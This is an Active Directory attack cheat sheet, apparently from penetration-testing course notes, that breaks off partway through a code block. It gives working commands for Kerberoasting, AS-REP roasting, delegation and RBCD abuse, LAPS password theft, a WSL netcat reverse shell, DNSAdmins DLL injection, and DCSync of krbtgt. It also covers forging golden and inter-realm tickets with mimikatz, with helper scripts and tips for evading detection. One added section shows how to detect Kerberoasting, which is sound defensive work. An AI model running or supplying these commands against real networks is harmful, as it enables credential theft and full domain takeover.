Escalation

Kerberoasting

Finding Service Accounts

PowerView:
Get-NetUser -SPN

ADModule:
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName

Request TGS

PowerShell Native:
# Request a TGS for the SPN; the ticket is cached in the current logon session (check with klist)
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local"

PowerView:
Request-SPNTicket

Exporting / Cracking

Rubeus / Hashcat:
# Roast. Only RC4 (etype 23, $krb5tgs$23$) hashes are practical to crack; accounts with AES keys
# give $krb5tgs$18$ hashes (hashcat -m 19700). /rc4opsec roasts only accounts without AES enabled
# and so avoids the encryption-downgrade signal defenders look for.
Rubeus.exe kerberoast /simple /nowrap [/user:USER] [/domain:DOMAIN] [/dc:DC]

# Crack
hashcat -m 13100 kerb.txt /usr/share/wordlists/rockyou.txt --force

Mimikatz / TGSRepCrack:
# Check the service tickets have been granted:
klist

# Export using Mimikatz
Invoke-Mimikatz -Command '"kerberos::list /export"'

# Crack
python.exe .\tgsrepcrack.py .\10k-worst-pass.txt .\240a10000-student.kirbi
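The defender's view of the roast above, as an added example that is not part of the original page. Every TGS request is logged on the DC as Security event 4769 with the service account name, the encryption type of the issued ticket and the requester. Roasting tools request RC4 (0x17) tickets for many user-account SPNs from one client in a short window, which normal clients rarely do. The event objects below are constructed to look like Get-WinEvent output; the realm and account names are placeholders.

```powershell
# Added example, not from the original page: detect Kerberoasting in Security event 4769.

function ConvertFrom-Event4769 {
    # Flatten the EventData of a 4769 record (as returned by Get-WinEvent) into a simple object.
    param([Parameter(Mandatory, ValueFromPipeline)]$Event)
    process {
        $xml  = [xml]$Event.ToXml()
        $data = @{}
        foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
        [pscustomobject]@{
            Time      = $Event.TimeCreated
            Requester = $data.TargetUserName
            ClientIP  = $data.IpAddress
            Service   = $data.ServiceName
            EncType   = $data.TicketEncryptionType
            Status    = $data.Status
        }
    }
}

function Find-Kerberoast {
    # Flag requesters that pulled RC4 service tickets for at least $Threshold distinct user SPNs.
    param(
        [Parameter(Mandatory, ValueFromPipeline)]$Request,
        [int]$Threshold = 5
    )
    begin { $buffer = New-Object System.Collections.ArrayList }
    process { [void]$buffer.Add($Request) }
    end {
        $buffer |
            Where-Object {
                $_.Status -eq '0x0' -and            # ticket was issued, not a failure
                $_.EncType -eq '0x17' -and          # RC4-HMAC: the only type worth cracking at scale
                $_.Service -notmatch '\$$' -and     # machine accounts have random 120-char passwords
                $_.Service -ne 'krbtgt'             # TGT renewals, not service tickets
            } |
            Group-Object Requester, ClientIP |
            ForEach-Object {
                $services = $_.Group.Service | Sort-Object -Unique
                if ($services.Count -ge $Threshold) {
                    [pscustomobject]@{
                        Requester = $_.Group[0].Requester
                        ClientIP  = $_.Group[0].ClientIP
                        Services  = $services -join ','
                        Count     = $services.Count
                    }
                }
            }
    }
}

# Constructed sample shaped like ConvertFrom-Event4769 output (no real log data):
# one host roasting six service accounts, plus normal AES traffic from another user.
$sample = @(
    foreach ($svc in 'sqlsvc','websvc','ftpsvc','backupsvc','svc-iis','svc-exch') {
        [pscustomobject]@{ Time='2024-01-01T10:00:00'; Requester='student1@DOLLARCORP.MONEYCORP.LOCAL'; ClientIP='::ffff:172.16.100.1'; Service=$svc; EncType='0x17'; Status='0x0' }
    }
    [pscustomobject]@{ Time='2024-01-01T10:00:05'; Requester='alice@DOLLARCORP.MONEYCORP.LOCAL'; ClientIP='::ffff:172.16.100.7'; Service='DCORP-DC$'; EncType='0x12'; Status='0x0' }
    [pscustomobject]@{ Time='2024-01-01T10:00:06'; Requester='alice@DOLLARCORP.MONEYCORP.LOCAL'; ClientIP='::ffff:172.16.100.7'; Service='sqlsvc';    EncType='0x12'; Status='0x0' }
)
$sample | Find-Kerberoast | Format-Table -AutoSize
```

Against a live DC the same pipeline is `Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4769} -ComputerName DC | ConvertFrom-Event4769 | Find-Kerberoast`. Only student1 is reported: alice's requests are AES and include a machine-account service. The RC4 filter is what Rubeus /rc4opsec and /tgtdeleg are designed to slip past, so in an AES-enabled domain also alert on any 0x17 ticket for an account that has AES keys, since that downgrade should not happen at all.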

AS-REP Roasting

Finding Accounts with Kerberos pre-auth disabled

PowerView_dev:
Get-DomainUser -PreauthNotRequired -Verbose

ADModule:
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $True} -Properties DoesNotRequirePreAuth

Force Disable Kerberos Pre-auth

Requires GenericAll / GenericWrite (or WriteProperty on userAccountControl) over the target user.

PowerView_dev:
# Find the objects our group (RDPUsers here) has rights over:
Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentityReferenceName -match "RDPUsers"}

# Disable Kerberos pre-auth for a user. 4194304 (0x400000) is DONT_REQ_PREAUTH; -XOR toggles the bit,
# so run it once only (a second run re-enables pre-auth):
Set-DomainObject -Identity Control1User -XOR @{useraccountcontrol=4194304} -Verbose
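The LDAP filters used in this section and in the delegation sections (DoesNotRequirePreAuth, TrustedForDelegation, TrustedToAuth) are views of individual userAccountControl bits, and the -XOR above flips one of them. The following is an added example, not code from the original page: it decodes the bit field and computes an idempotent value to write with -Set instead of -XOR. The UAC values and the user name in the comments are constructed placeholders.

```powershell
# Added example, not from the original page: decode and edit userAccountControl bits.
[Flags()] enum UserAccountControl {
    ACCOUNTDISABLE                 = 0x0000002
    PASSWD_NOTREQD                 = 0x0000020
    NORMAL_ACCOUNT                 = 0x0000200
    WORKSTATION_TRUST_ACCOUNT      = 0x0001000
    SERVER_TRUST_ACCOUNT           = 0x0002000
    DONT_EXPIRE_PASSWORD           = 0x0010000
    TRUSTED_FOR_DELEGATION         = 0x0080000   # unconstrained delegation
    NOT_DELEGATED                  = 0x0100000   # "account is sensitive and cannot be delegated"
    DONT_REQ_PREAUTH               = 0x0400000   # 4194304: AS-REP roastable
    TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000   # constrained delegation with protocol transition
}

function Get-UacFlags {
    # Names of the bits set in a userAccountControl value.
    param([Parameter(Mandatory)][int]$Value)
    ([UserAccountControl]$Value).ToString() -split ',\s*'
}

function Set-UacFlag {
    # OR the flag in. Writing this result with -Set is idempotent, unlike -XOR, which toggles.
    param([Parameter(Mandatory)][int]$Value, [Parameter(Mandatory)][UserAccountControl]$Flag)
    $Value -bor [int]$Flag
}

function Clear-UacFlag {
    # Clear the flag: the clean-up value once you are done roasting.
    param([Parameter(Mandatory)][int]$Value, [Parameter(Mandatory)][UserAccountControl]$Flag)
    $Value -band (-bnot [int]$Flag)
}

# Constructed values for the demo (not read from a directory):
$normalUser = 512                                                       # NORMAL_ACCOUNT only
$roastable  = Set-UacFlag -Value $normalUser -Flag DONT_REQ_PREAUTH     # what the -XOR above produces on a clean user
Get-UacFlags $roastable
Get-UacFlags (Set-UacFlag -Value $roastable -Flag DONT_REQ_PREAUTH)     # same value again: setting is idempotent
Get-UacFlags (Clear-UacFlag -Value $roastable -Flag DONT_REQ_PREAUTH)   # back to the original value
Get-UacFlags 16781312                                                   # 0x1001000: workstation with protocol transition

# Live use with PowerView dev loaded (USER is a placeholder):
#   $cur = [int](Get-DomainUser USER -Properties useraccountcontrol).useraccountcontrol
#   Set-DomainObject -Identity USER -Set @{useraccountcontrol = (Set-UacFlag -Value $cur -Flag DONT_REQ_PREAUTH)}
#   Set-DomainObject -Identity USER -Set @{useraccountcontrol = (Clear-UacFlag -Value $cur -Flag DONT_REQ_PREAUTH)}   # clean-up
```

Reading the current value first matters: -XOR on an account that already has DONT_REQ_PREAUTH set would silently re-enable pre-authentication and leave you wondering why Rubeus returns nothing. The same bit arithmetic tells you which of the TRUSTED_* flags a delegation account actually carries before you pick the s4u technique later on this page.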

ASREPRoast

Rubeus:
# Get the hashes of all accounts with pre-auth disabled
Rubeus.exe asreproast /format:hashcat /nowrap [/user:USER] [/outfile:FILEPATH]

# Crack with hashcat
hashcat -m 18200 asreproast.txt /usr/share/wordlists/rockyou.txt --force

Invoke-ASREPRoast (ASREPRoast.ps1):
# Single user:
Get-ASREPHash -UserName VPN1user -Verbose

# All users with pre-auth disabled:
Invoke-ASREPRoast -Verbose

# Crack using John
./john vpn1user.txt --wordlist=wordlist.txt

SetSPN - Targeted Kerberoasting

Enumeration

PowerView_dev:
# Viewing our ACL permissions:
Invoke-ACLScanner -ResolveGUIDs | ?{$_.IdentityReferenceName -match "RDPUsers"}

# Check whether the user already has an SPN:
Get-DomainUser -Identity supportuser | select serviceprincipalname

ADModule:
# Check whether the user already has an SPN:
Get-ADUser -Identity supportuser -Properties ServicePrincipalName | select ServicePrincipalName

Setting SPN (must be unique in the domain)

Requires GenericAll / GenericWrite or WriteProperty on servicePrincipalName over the target user.

PowerView / SharpView:
Set-DomainObject -Identity USER -Set @{serviceprincipalname='ops/whatever1'}

## Clean up
Set-DomainObject -Identity USER -Clear serviceprincipalname

ADModule:
Set-ADUser -Identity support1user -ServicePrincipalNames @{Add='ops/whatever1'}

## Clean up
Set-ADUser -Identity support1user -ServicePrincipalNames @{Remove='ops/whatever1'}

Extraction and cracking are the same as for Kerberoasting (Rubeus.exe kerberoast /user:USER).

Unconstrained Delegation

Enumeration

PowerView:
Get-NetComputer -Unconstrained

ADModule:
Get-ADComputer -Filter {TrustedForDelegation -eq $True}
Get-ADUser -Filter {TrustedForDelegation -eq $True}

Compromise the server and wait for a privileged user to authenticate to it, or coerce the DC with the printer bug while Rubeus listens for its TGT

# Printer bug: https://github.com/leechristensen/SpoolSample (the Print Spooler must be running on TARGET)

# Listen for incoming TGTs on the unconstrained host (elevated)
.\Rubeus.exe monitor /interval:5 [/filteruser:DC$]

# Trigger the printer bug: TARGET authenticates back to CAPTURE (our unconstrained host)
.\SpoolSample_v4.5_x64.exe TARGET CAPTURE

# Use the captured TGT (base64 from the monitor output)
Rubeus.exe ptt /ticket:<base64ticket>

Export tickets and steal DA

Rubeus:
# Look at tickets on the system (run as SYSTEM to see all logon sessions)
Rubeus.exe triage

# Get the ticket
Rubeus.exe dump /luid:TICKETLUID /nowrap

# Use the ticket
Rubeus.exe ptt [/ticket:BASE64TICKET] [/luid:LUID]

Mimikatz:
# Export:
Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'

# PTT:
Invoke-Mimikatz -Command '"kerberos::ptt C:\Documents\user1\[0;2ceb8b3]-2.kirbi"'

Constrained Delegation

Enumeration

PowerView_dev:
# Which users / computers are trusted to authenticate for delegation
Get-DomainUser -TrustedToAuth
Get-DomainComputer -TrustedToAuth

# Which services the found users / computers may delegate to
Get-DomainUser USER -Properties samaccountname,msds-allowedtodelegateto | select -Expand msds-allowedtodelegateto
Get-DomainComputer COMP -Properties samaccountname,msds-allowedtodelegateto | select -Expand msds-allowedtodelegateto

ADModule:
Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo

Getting Ticket

Needs the NTLM hash (or AES key / clear-text password) of the account configured for constrained delegation. The s4u commands below rely on protocol transition ("use any authentication protocol", TRUSTED_TO_AUTH_FOR_DELEGATION): S4U2Self gets a ticket for the impersonated user and S4U2Proxy exchanges it for a ticket to the allowed service. The service name in that ticket is not protected, so /altservice swaps the SPN's service class for any service on the same host (LDAP for DCSync, CIFS, HOST, HTTP, ...).

Rubeus:
===DCSYNC===
# From a computer account with constrained delegation rights for time/dcorp-dc.
# The hash is that of the machine account
Rubeus.exe s4u /user:COMP$ /rc4:HASH /impersonateuser:Administrator /msdsspn:"time/DC.DOMAIN.LOCAL" /altservice:LDAP,cifs /ptt

# DCSync (Cobalt Strike beacon syntax; with mimikatz: lsadump::dcsync /user:DOMAIN\krbtgt)
dcsync DOMAIN DOMAIN\krbtgt

===FILESHARE===
# As a user with constrained delegation rights for CIFS/COMP
# The hash is that of the user with delegation rights
Rubeus.exe s4u /user:USER /rc4:HASH /impersonateuser:Administrator /msdsspn:"CIFS/COMP" /ptt

# Check access
ls \\COMP\c$\

Kekeo:
===DCSYNC===
## Request TGT with Kekeo
tgt::ask /user:COMP$ /domain:DOMAIN /rc4:HASH

## Request TGS with Kekeo (the | requests an alternate service in the same run)
tgs::s4u /tgt:TGT.kirbi /user:Administrator@DOMAIN.local /service:time/DC.DOMAIN.local|ldap/DC.DOMAIN.local

## Inject ticket
Invoke-Mimikatz -Command '"kerberos::ptt TGS_.kirbi"'

## DCSync
Invoke-Mimikatz -Command '"lsadump::dcsync /user:DOMAIN\krbtgt"'

===FILE SHARE===
## Request TGT with Kekeo
tgt::ask /user:USER /domain:DOMAIN /rc4:HASH

## Next request TGS with Kekeo (note the cifs service on the end)
tgs::s4u /tgt:TGT_.kirbi /user:Administrator@DOMAIN.local /service:cifs/COMP-FQDN

## Inject ticket with mimikatz
Invoke-Mimikatz -Command '"kerberos::ptt TGS_.kirbi"'

## Check it worked
ls \\COMP-FQDN\c$

Resource Based Constrained Delegation

Enumeration

# Find the ACL with BloodHound or Invoke-ACLScanner / Get-ObjectAcl.
# Need: control of an account with an SPN, or the ability to add a computer account (any user has this by default: ms-DS-MachineAccountQuota = 10),
# and write permission (GenericWrite / WriteProperty on msDS-AllowedToActOnBehalfOfOtherIdentity) on the target computer object.

Adding New Computer Object

Import-Module .\Powermad.psd1

New-MachineAccount -Domain offensiveps.powershell.local -DomainController 192.168.2.1 -MachineAccount AttackCompObj -Password (ConvertTo-SecureString 'Password123' -AsPlainText -Force) -Verbose

Set RBCD on target

# Import AD Module
Import-Module C:\AD\Tools\ADModule-master\Microsoft.ActiveDirectory.Management.dll
Import-Module C:\AD\Tools\ADModule-master\ActiveDirectory\ActiveDirectory.psd1

# Set RBCD on the target (writes msDS-AllowedToActOnBehalfOfOtherIdentity)
Set-ADComputer <targethostname> -PrincipalsAllowedToDelegateToAccount <AttackCompObj>$ -Verbose

# Clean up afterwards
Set-ADComputer <targethostname> -PrincipalsAllowedToDelegateToAccount $null -Verbose
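Set-ADComputer hides what it writes: msDS-AllowedToActOnBehalfOfOtherIdentity is a binary security descriptor whose DACL grants the delegating principal full control. Building it yourself lets you set RBCD with PowerView alone when RSAT is not available, and decoding it tells you who is already allowed to impersonate users to a host. This is an added example, not code from the original page; the SID, the object names and the PowerView calls in the comments are placeholders.

```powershell
# Added example, not from the original page: build and decode the RBCD security descriptor.

function New-RbcdDescriptor {
    # Bytes to store in msDS-AllowedToActOnBehalfOfOtherIdentity for the given principal SIDs.
    # One access-allowed ACE with full control per SID, owner Builtin Administrators, no SACL.
    param([Parameter(Mandatory)][string[]]$Sid)
    $aces  = ($Sid | ForEach-Object { "(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$_)" }) -join ''
    $sd    = New-Object System.Security.AccessControl.RawSecurityDescriptor("O:BAD:$aces")
    $bytes = New-Object byte[] ($sd.BinaryLength)
    $sd.GetBinaryForm($bytes, 0)
    $bytes
}

function Get-RbcdPrincipals {
    # The reverse: which SIDs may act on behalf of other identities to this computer.
    param([Parameter(Mandatory)][byte[]]$Bytes)
    $sd = New-Object System.Security.AccessControl.RawSecurityDescriptor($Bytes, 0)
    foreach ($ace in $sd.DiscretionaryAcl) { $ace.SecurityIdentifier.Value }
}

# Constructed SID for the demo (a made-up AttackCompObj$ in a made-up domain):
$attacker = 'S-1-5-21-1874506631-3219952063-538504511-1601'
$bytes    = New-RbcdDescriptor -Sid $attacker
Get-RbcdPrincipals -Bytes $bytes        # round-trips to the SID above

# Live use with PowerView dev loaded (<target> and AttackCompObj are placeholders):
#   $sid = (Get-DomainComputer AttackCompObj -Properties objectsid).objectsid
#   Get-DomainComputer <target> | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity' = (New-RbcdDescriptor -Sid $sid)}
#   # who is already allowed?
#   Get-RbcdPrincipals -Bytes (Get-DomainComputer <target> -Properties 'msds-allowedtoactonbehalfofotheridentity').'msds-allowedtoactonbehalfofotheridentity'
#   # clean-up
#   Get-DomainComputer <target> | Set-DomainObject -Clear 'msds-allowedtoactonbehalfofotheridentity'
```

Check the existing value before you overwrite it: if an administrator has legitimately configured RBCD for another service, pass both SIDs to New-RbcdDescriptor so the original delegation keeps working and your change does not break a service (and get noticed).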

Control Target

# Get the RC4 key (NT hash) of the plaintext password if you created the machine account yourself
.\Rubeus.exe hash /password:<computerobjpassword>

# Request a TGS as Administrator for the target; HTTP is the service class WinRM uses
.\Rubeus.exe s4u /user:AttackCompObj$ /rc4:HASH /msdsspn:http/<target> /impersonateuser:Administrator /ptt

# HTTP allows PSRemoting (add /altservice:cifs,host for the file system / PsExec)
Enter-PSSession -ComputerName <target>

LAPS Abuse

Enumeration

LAPS Module:
# Easiest done with the LAPS PowerShell module (AdmPwd.PS)

# Get the OUs with PowerView
Get-NetOU

# Import module
Import-Module C:\AD\Tools\AdmPwd.PS\AdmPwd.PS.psd1

# Find who can read LAPS passwords for computers in an OU
Find-AdmPwdExtendedRights -Identity <OU>

PowerView:
# Basic but reliable
Get-NetOU -FullData

# Script to get it in a nice format (unreliable): who has ReadProperty on ms-Mcs-AdmPwd
Get-NetOU -FullData | Get-ObjectAcl -ResolveGUIDs | Where-Object { ($_.ObjectType -like 'ms-Mcs-AdmPwd') -and ($_.ActiveDirectoryRights -match 'ReadProperty') } | ForEach-Object { $_ | Add-Member NoteProperty 'IdentitySID' $(Convert-NameToSid $_.IdentityReference).SID; $_ }

Abuse

LAPS Module:
# Once we have compromised a user with read rights on an OU managed by LAPS
Get-AdmPwdPassword -ComputerName <targetmachine>

# With the password you can log in to the machine as <targetmachine>\Administrator (or the managed local account).

# With SYSTEM on a LAPS-managed machine we can push back the password expiration time (ms-Mcs-AdmPwdExpirationTime) to persist longer on the machine.

# With DA we can modify the ACLs of computer objects to grant ourselves ReadProperty on ms-Mcs-AdmPwd and read passwords in clear.

# The client component (C:\Program Files\LAPS\CSE\AdmPwd.dll) has no integrity check and can be replaced with a malicious DLL (known password, long expiration time, etc.).

PowerView:
# Once we have compromised a user with the right privileges (Get-ADObject here is PowerView's cmdlet, not RSAT's):
Get-ADObject -SamAccountName <targetmachine>$ | select -ExpandProperty ms-mcs-admpwd

ADModule:
# Once we have compromised a user with the right privileges:
Get-ADComputer -Identity <targetmachine> -Properties ms-Mcs-AdmPwd | select -ExpandProperty ms-Mcs-AdmPwd

Just Enough Administration (JEA) Abuse

JEA lets non-admin users PSRemote into restricted session configurations that expose only a whitelisted set of cmdlets. These endpoints commonly run as a virtual account or a privileged gMSA, so if you break out of the cmdlet restrictions you are running as an admin of the box.

Enumeration

# No official way to scan for JEA endpoints remotely has been found so far; look for hints in AD object descriptions. Locally, Get-PSSessionConfiguration lists them (needs admin).

# Role Capability file (visible cmdlets etc.)
New-PSRoleCapabilityFile -Path .\JEA.psrc

# Session configuration file (user-to-role mappings and role definitions), then register it
New-PSSessionConfigurationFile -SessionType RestrictedRemoteServer -Path .\JEA.pssc
Register-PSSessionConfiguration -Path .\JEA.pssc -Name 'Persist' -Force

# If you can find .pssc or .psrc files, they show exactly what is exposed and help plan a breakout.

Abuse

# Connect to the JEA endpoint
Enter-PSSession -ComputerName <target> -ConfigurationName <config name>

# Enumerate the commands available, then look them up in the docs to see what is possible
Get-Command

# Some dangerous cmdlets (arbitrary processes or configuration changes from inside the sandbox)
Start-Process
Add-Computer
New-IISSite
Set-PSSessionConfiguration -Name <profilename> -SecurityDescriptorSddl <SDDL>   # https://gist.github.com/jborean93/6d9aaf868d1d40344188984ebb431b04
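What separates a breakable JEA endpoint from a sound one is the role capability file, not the session type. The following added example (not from the original page) writes a weak and a hardened role capability side by side plus the session configuration that maps a group to them, and runs the built-in syntax check. Nothing is registered; files go to a temp directory. DOMAIN\Helpdesk and the service name are placeholders, and RoleCapabilityFiles needs PowerShell 5.1 or later.

```powershell
# Added example, not from the original page: weak vs. hardened JEA role capability.
$dir = Join-Path $env:TEMP 'jea-demo'
New-Item -ItemType Directory -Path $dir -Force | Out-Null

# Weak: Start-Process is visible. Because the session runs as a virtual account (local admin),
# the connecting user can simply run any binary as that account.
New-PSRoleCapabilityFile -Path "$dir\Helpdesk-weak.psrc" -VisibleCmdlets 'Restart-Service','Start-Process'

# Hardened: one cmdlet, one parameter, one allowed value. No path to arbitrary code.
New-PSRoleCapabilityFile -Path "$dir\Helpdesk.psrc" -VisibleCmdlets @{
    Name       = 'Restart-Service'
    Parameters = @{ Name = 'Name'; ValidateSet = 'Spooler' }
}

foreach ($role in 'Helpdesk-weak','Helpdesk') {
    New-PSSessionConfigurationFile -Path "$dir\$role.pssc" `
        -SessionType RestrictedRemoteServer `
        -RunAsVirtualAccount `
        -TranscriptDirectory "$dir\transcripts" `
        -RoleDefinitions @{ 'DOMAIN\Helpdesk' = @{ RoleCapabilityFiles = "$dir\$role.psrc" } }
    # Syntax check only: it does not judge whether the exposed capabilities are safe.
    Test-PSSessionConfigurationFile -Path "$dir\$role.pssc"
}

# What a user of the weak endpoint does once connected (no interactive shell needed):
#   Start-Process net -ArgumentList 'localgroup Administrators DOMAIN\helpdeskuser /add'
# Registering and connecting (requires admin on the target):
#   Register-PSSessionConfiguration -Name Helpdesk -Path "$dir\Helpdesk.pssc" -Force
#   Enter-PSSession -ComputerName <target> -ConfigurationName Helpdesk
```

When reviewing an endpoint you have found, read its .psrc for VisibleCmdlets entries without a Parameters/ValidateSet restriction and for any VisibleExternalCommands; either one, combined with RunAsVirtualAccount, is the breakout the abuse list above describes. The transcript directory is also worth noting: with a hardened endpoint every command you type is logged there.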

PowerShell Web Access (PSWA) Abuse

Enumeration

# PSWA gives a PowerShell session in the browser over HTTPS (port 443).
# Default path
https://hostname/pswa

# Needs credentials that the authorization rules allow (admin by default); the available cmdlets depend on the session configuration
Get-Command

Abuse

# Depends on the configuration, but look for sensitive commands and binaries:
Net.exe
Reg.exe
Invoke-Command
Start-Process

# If a breakout from a constrained session is needed, refer to JEA as well.

Configure for Persistence

# Install
Install-WindowsFeature -Name WindowsPowerShellWebAccess

# Configure
Install-PswaWebApplication -UseTestCertificate

# Configure rules (the wildcard * can be used for all values, allowing all users / computers / configurations)
Add-PswaAuthorizationRule -UserName <domain\user> -ComputerName <computer_name> -ConfigurationName <session_configuration_name>

Windows Subsystem Linux (WSL) Abuse

Enumeration

# Find a Linux distro on the Windows host; you should see its binaries and filesystem
# (WSL1: %LOCALAPPDATA%\Packages\<distro>\LocalState\rootfs; WSL2 keeps it in an ext4.vhdx)

# Files are accessible like on Linux: /etc/shadow etc.

# Worth looking for keytab files. These let Linux talk Kerberos, and their keys can be extracted and cracked: https://github.com/sosdave/KeyTabExtract
python3 keytabextract.py /root/ADShare/wslhost.keytab

Abuse

# Run Windows binaries from bash
bash.exe -c cmd.exe

# Run Windows binaries via wsl
wsl.exe cmd.exe

# These run with the permissions of the WSL process, i.e. as the current Windows user.

# Reverse shell (quote the whole pipeline so bash inside WSL parses it, not cmd / PowerShell on the Windows side)
wsl.exe bash -c "mknod /tmp/backpipe p && /bin/sh 0</tmp/backpipe | nc 192.168.100.1 443 1>/tmp/backpipe"

# Useful for stealth, since few endpoint tools inspect activity inside WSL. ELF persistence would be very good.

Windows Device Guard Bypass

Enumeration

# With Device Guard / WDAC you will typically be in a PowerShell Constrained Language Mode shell with application whitelisting.
$ExecutionContext.SessionState.LanguageMode

# List the effective AppLocker policies
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections

Bypass

# Also known as CLM bypasses; there are several online.
# Typically Windows-signed binaries are allowed, worth trying:
Procdump.exe
Psexec.exe
Reg.exe

# CLM Bypasses:

DNSAdmins

Enumeration

PowerView:
Get-NetGroupMember -GroupName "DNSAdmins"

ADModule:
Get-ADGroupMember -Identity DNSAdmins

Abuse

# Compromising a DNSAdmins member is required. The DLL is loaded by dns.exe (running as SYSTEM on the DC) when the service restarts.

# Configure the DLL using dnscmd.exe (the share must be readable by the DC's machine account):
dnscmd DC /config /serverlevelplugindll \\172.16.50.100\dll\mimilib.dll

# Configure the DLL using the DNSServer module:
$dnsettings = Get-DnsServerSetting -ComputerName DC -Verbose -All
$dnsettings.ServerLevelPluginDll = "\\172.16.50.100\dll\mimilib.dll"
Set-DnsServerSetting -InputObject $dnsettings -ComputerName DC -Verbose

# Restart the DNS service. DNSAdmins are not granted restart rights by default but often are in practice.
# Use sc.exe: in PowerShell, sc is an alias for Set-Content.
sc.exe \\DC stop dns
sc.exe \\DC start dns

# By default mimilib.dll logs all DNS queries to C:\Windows\System32\kiwidns.log

Microsoft Exchange Abuse

Enumeration

# Exchange groups have high permissions. Look for groups such as:
Organization Management (full control over the Exchange Windows Permissions group)
Exchange Windows Permissions (WriteDACL on the domain object on Exchange versions before the 2019 updates)
Exchange Trusted Subsystem (can modify the DACL of DNSAdmins and others; local admin on Exchange servers)

Abuse

# Own a user in the groups above or own an Exchange server
# PTH as the user or as the Exchange server machine account

# Import ADModule and RACE
Import-Module .\ADModule-master\Microsoft.ActiveDirectory.Management.dll
Import-Module .\ADModule-master\ActiveDirectory\ActiveDirectory.psd1
. .\RACE.ps1

# Give the user access to the domain object
Set-ADACL -SamAccountName DOMAIN\USER -DistinguishedName 'DC=techcorp,DC=local' -Server techcorp.local -Verbose

# Give DCSync (Replicating Directory Changes / All)
Set-ADACL -SamAccountName DOMAIN\USER -DistinguishedName 'DC=techcorp,DC=local' -GUIDRight DCSync -Server techcorp.local -Verbose

# (As DA) Give the user WriteDACL over the Exchange Windows Permissions group for persistence
Set-DCPermissions -Method GroupDACL -DistinguishedName 'CN=Exchange Windows Permissions,OU=Microsoft Exchange Security Groups,DC=techcorp,DC=local' -SAMAccountName DOMAIN\USER -Verbose

# (As the user just added) Use that privilege to modify the ACL of Exchange Windows Permissions and grant ourselves WriteMember
Set-ADACL -SamAccountName DOMAIN\USER -DistinguishedName 'CN=Exchange Windows Permissions,OU=Microsoft Exchange Security Groups,DC=techcorp,DC=local' -GUIDRight WriteMember -Server techcorp.local -Verbose

Cross-Domain Trust Tickets

Get Trust Key

# Mimikatz: dump the trust keys on the DC
Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName DC

# Mimikatz: DCSync the trust account (the trust key is the password of the inter-domain trust account TARGETDOMAIN$)
Invoke-Mimikatz -Command '"lsadump::dcsync /user:DOMAIN\TARGETDOMAIN$"'

Forging Inter-Realm TGT

Invoke-Mimikatz -Command '"Kerberos::golden /user:Administrator /domain:DOMAIN /sid:S-1-5-21-1874506631-3250652063-538504511 /sids:S-1-5-21-280534878-1496970234-700767426-519 /rc4:HASH /service:krbtgt /target:TARGETDOMAIN.LOCAL /ticket:C:\AD\Tools\kekeo_old\trust_tkt.kirbi"'

Option                                               Function
Kerberos::golden                                     Mimikatz module
/domain:DOMAIN.LOCAL                                 FQDN of the current domain
/sid:S-1-5-21-166606631-311152063-538504511          SID of the current domain
/sids:S-1-5-21-282224878-1496977734-700767426-519    SID of the Enterprise Admins group of the parent (forest root) domain
/rc4:HASH                                            RC4 of the trust key
/user:Administrator                                  User to impersonate
/service:krbtgt                                      Target service in the parent domain
/target:TARGETDOMAIN.LOCAL                           FQDN of the parent domain
/ticket:C:\AD\Tools\kekeo_old\trust_tkt.kirbi        Path where the ticket is to be saved

Get a TGS for a service in the target domain (CIFS below, but could be LDAP, HOST or HTTP) using the trust ticket

.\asktgs.exe C:\AD\Tools\kekeo_old\trust_tkt.kirbi CIFS/DC.DOMAIN

Use the TGS to access the service in the target domain (may need to be run twice)

# Convert and inject the TGS into LSA
.\kirbikator.exe lsa .\CIFS.DC.DOMAIN.kirbi

# Access
ls \\DC.DOMAIN\c$

Cross-Domain using krbtgt Hash

Create Ticket Abusing SID History

# Get the krbtgt hash of the current (child) domain
Invoke-Mimikatz -Command '"lsadump::lsa /patch"'

# Create the ticket
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:DOMAIN /sid:S-1-5-21-1874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234-700767426-519 /krbtgt:HASH /ticket:C:\AD\Tools\krbtgt_tkt.kirbi"'

In the command above the mimikatz option /sids forcibly sets the SID History of the ticket to the Enterprise Admins group of the forest root domain (moneycorp.local in the lab, where the current domain is dollarcorp.moneycorp.local). SID filtering is not applied between domains of the same forest, so the parent domain honours the injected SID.
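Both the inter-realm trust ticket and the krbtgt golden ticket above stand or fall on the /sid and /sids values: the current domain's SID and the forest root's Enterprise Admins (RID 519) or Domain Controllers (RID 516) SID. A mistyped sub-authority is easy to miss and yields a ticket whose SID History grants nothing. The following added example, not code from the original page, validates SID strings structurally and assembles the mimikatz arguments for both variants on this page. The SIDs in the demo are constructed lab-style values; the ADModule calls in the comments show where the live values come from.

```powershell
# Added example, not from the original page: build and sanity-check /sid and /sids for kerberos::golden.

function Test-SidString {
    # Structural check: S-1-<authority>-<1..15 sub-authorities>, each sub-authority a 32-bit value.
    param([Parameter(Mandatory)][string]$Sid)
    if (-not ($Sid -match '^S-1-(\d{1,15})((?:-\d{1,20}){1,15})$')) { return $false }
    if ([uint64]$Matches[1] -gt 0xFFFFFFFFFFFF) { return $false }          # 48-bit identifier authority
    foreach ($sub in ($Matches[2].TrimStart('-') -split '-')) {
        if ($sub.Length -gt 10 -or [uint64]$sub -gt [uint32]::MaxValue) { return $false }
    }
    return $true
}

function Get-DomainSid {
    # Strip the RID from an account or group SID (S-1-5-21-a-b-c-RID -> S-1-5-21-a-b-c).
    param([Parameter(Mandatory)][string]$Sid)
    if (-not (Test-SidString $Sid)) { throw "invalid SID: $Sid" }
    $Sid -replace '-\d+$', ''
}

function New-GoldenSids {
    # /sid is the current (child) domain; /sids carries the extra SID History.
    param(
        [Parameter(Mandatory)][string]$CurrentDomainSid,
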